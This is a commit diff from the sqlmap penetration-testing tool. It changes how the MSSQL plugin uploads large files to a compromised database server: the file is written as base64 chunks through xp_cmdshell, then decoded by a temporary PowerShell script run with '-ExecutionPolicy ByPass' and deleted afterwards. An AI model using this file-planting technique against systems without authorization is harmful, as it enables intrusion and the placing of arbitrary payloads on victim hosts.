working on allowing large files to be uploaded via powershell - issue #742

bdamele · bdamele · commit 3e431ec2022d · 2014-06-30T23:53:04.000+01:00
diff --git a/plugins/dbms/mssqlserver/filesystem.py b/plugins/dbms/mssqlserver/filesystem.py
@@ -169,16 +169,31 @@ def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType):
         infoMsg += "to file '%s'" % dFile
         logger.info(infoMsg)
 
+        encodedFileContent = base64encode(wFileContent)
+        encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True)
+        encodedBase64FilePath = "%s\%s" % (tmpPath, encodedBase64File)
+
         randPSScript = "tmpf%s.ps1" % randomStr(lowercase=True)
         randPSScriptPath = "%s\%s" % (tmpPath, randPSScript)
 
-        encodedFileContent = base64encode(wFileContent)
-        psString = "$Content = [System.Convert]::FromBase64String(\"%s\"); Set-Content -Path \"%s\" -Value $Content -Encoding Byte" % (encodedFileContent, dFile)
+        wFileSize = len(wFileContent)
+        chunkMaxSize = 1024
+
+        logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath)
 
-        logger.debug("uploading the PowerShell script to %s, please wait.." % randPSScriptPath)
+        for i in xrange(0, wFileSize, chunkMaxSize):
+            wEncodedChunk = encodedFileContent[i:i + chunkMaxSize]
+            self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File)
+
+        #psString = "$Content = [System.Convert]::FromBase64String(\"%s\"); Set-Content -Path \"%s\" -Value $Content -Encoding Byte" % (encodedFileContent, dFile)
+        psString = "$Base64 = Get-Content -Path %s; $Content = " % encodedBase64FilePath
+        psString += "[System.Convert]::FromBase64String($Base64); Set-Content "
+        psString += "-Path %s -Value $Content -Encoding Byte" % dFile
+
+        logger.debug("uploading the PowerShell base64-decoding script to %s, please wait.." % randPSScriptPath)
         self.xpCmdshellWriteFile(psString, tmpPath, randPSScript)
 
-        logger.debug("executing the PowerShell script to write the %s file" % dFile)
+        logger.debug("executing the PowerShell base64-decoding script to write the %s file" % dFile)
 
         commands = ("powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath,
                     "del /F /Q \"%s\"" % randPSScriptPath)
@@ -207,7 +222,6 @@ def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileTyp
             complComm = " & ".join(command for command in commands)
 
             self.execCmd(complComm)
-
         else:
             debugMsg = "the file is larger than %d bytes. " % debugSize
             debugMsg += "sqlmap will split it into chunks locally, upload "
@@ -305,7 +319,7 @@ def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
         End Function""" % (randFilePath, dFile)
 
         vbs = vbs.replace("    ", "")
-        encodedFileContent = wFileContent.encode("base64")[:-1]
+        encodedFileContent = base64encode(wFileContent)
 
         logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
 
